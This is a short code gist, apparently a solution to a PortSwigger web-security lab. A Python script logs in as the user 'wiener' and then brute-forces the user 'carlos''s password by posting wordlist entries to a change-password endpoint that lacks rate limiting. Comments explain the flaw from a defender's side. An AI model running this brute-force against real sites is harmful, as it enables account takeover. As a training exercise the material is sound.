
@tuananhlai
Created March 24, 2021 05:33
The code I used to solve a PortSwigger lab about brute-forcing a password.
import requests
# One shared requests.Session: cookies set by a response are sent again on
# later requests made through the same object, so login() and
# change_password() operate on the same authenticated session.
session = requests.Session()
def login():
    """Authenticate the shared session as the lab user ``wiener``.

    Posts the hard-coded credentials to the lab's ``/login`` form and prints
    the HTTP status code. Redirects are not followed, so the printed code is
    that of the login response itself, not of any page it redirects to.
    """
    login_endpoint = "https://ac291fbf1e82ce2980c4012800f4005b.web-security-academy.net/login"
    # Any cookies on this response stay on the module-level session.
    reply = session.post(
        url=login_endpoint,
        data={'username': 'wiener', 'password': 'a'},
        allow_redirects=False,
    )
    print(reply.status_code)
def change_password(username, old_password):
    """Submit the lab's change-password form and print the HTTP status code.

    Args:
        username: Value sent in the form's ``username`` field.
        old_password: Value sent in the ``current-password`` field.

    The new password is fixed to ``"a"`` in both confirmation fields.
    Redirects are not followed, and the response is not interpreted beyond
    printing its status code.

    Defensive reading: the account is named in the request body, separately
    from the session that sends the request. A hardened endpoint would take
    the account from the authenticated session and rate-limit failed
    current-password checks the same way it does failed logins.
    NOTE(review): how the lab server treats these fields is not visible from
    this script.
    """
    endpoint = "https://ac291fbf1e82ce2980c4012800f4005b.web-security-academy.net/my-account/change-password"
    form = dict([
        ("username", username),
        ("current-password", old_password),
        ("new-password-1", "a"),
        ("new-password-2", "a"),
    ])
    reply = session.post(url=endpoint, data=form, allow_redirects=False)
    print(reply.status_code)
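if __name__ == '__main__':
    # Read the candidate list inside a context manager so the file handle is
    # closed as soon as the contents are in memory.
    with open('password.txt', 'r') as wordlist:
        passwords = wordlist.read().split('\n')
    # split('\n') keeps a trailing empty entry when the file ends with a
    # newline; that entry is submitted like any other value.
    for p in passwords:
        # Every attempt is preceded by a fresh login as wiener, so each
        # change-password request is sent from a newly authenticated session.
        login()
        change_password("carlos", p)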